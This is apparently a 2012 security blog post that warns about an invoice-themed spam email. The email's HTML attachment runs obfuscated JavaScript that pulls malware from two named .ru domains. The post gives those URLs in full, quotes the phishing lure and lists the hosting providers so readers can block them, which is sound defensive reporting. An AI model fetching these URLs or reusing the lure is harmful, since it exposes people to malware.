Sponsored by..

Friday 10 February 2012

"End of Aug. Statement" spam / kamarovoskorlovo.ru and serebrokakzoloto.ru

Here's yet more spam with a malicious payload:

Date:      Fri, 9 Feb 2012 09:46:12 +0300
From:      BlandTAINA@gmail.com
Subject:      Re: FW: End of Aug. Statement
Attachments:     Invoice_8W20576.htm


as reqeusted I give you inovices issued to you per february (Internet Explorer format).



"Invoice_8W20576.htm" is an HTML attachment containing some obfuscated Javascript that connects to kamarovoskorlovo.ru:8080/images/aublbzdni.php which then attempts to download some malicious components from that domain and also serebrokakzoloto.ru:8080/images/jw.php?i=8 . A Wepawet report can be found here and here.

kamarovoskorlovo.ru and serebrokakzoloto.ru are multihomed on several servers (a raw list can be found at the end of the post). You'll notice that Slicehost figures prominently. (OVH Systems, France) (Amazon Data Services, Ireland) (Steadfast Networks, US) (Slicehost, US) (Slicehost, US) (Comcast Business Communications, US) (Colopronto, US) (iPower, US) (MVN Systems Ltd, Bulgaria) (Neterra Ltd, Bulgaria) (Free SAS / ProXad, France) (SiliconTower, Spain) (Hosting Services Inc, US) (Web24 Pty Ltd, Australia) (GoDaddy, US) (Slicehost, US) (Linode, US) (ThePlanet, US) (Slicehost, US) (Slicehost, US) (Slicehost, US) (G2KHosting, Argentina) (Century Telecom Ltda, Brazil) (Jaidee Daijai, US) (Slicehost, US)

Blocking access to those IPs will prevent any other malicious sites on the same servers from causing problems. Underneath is a raw list that you can copy and pase.

No comments: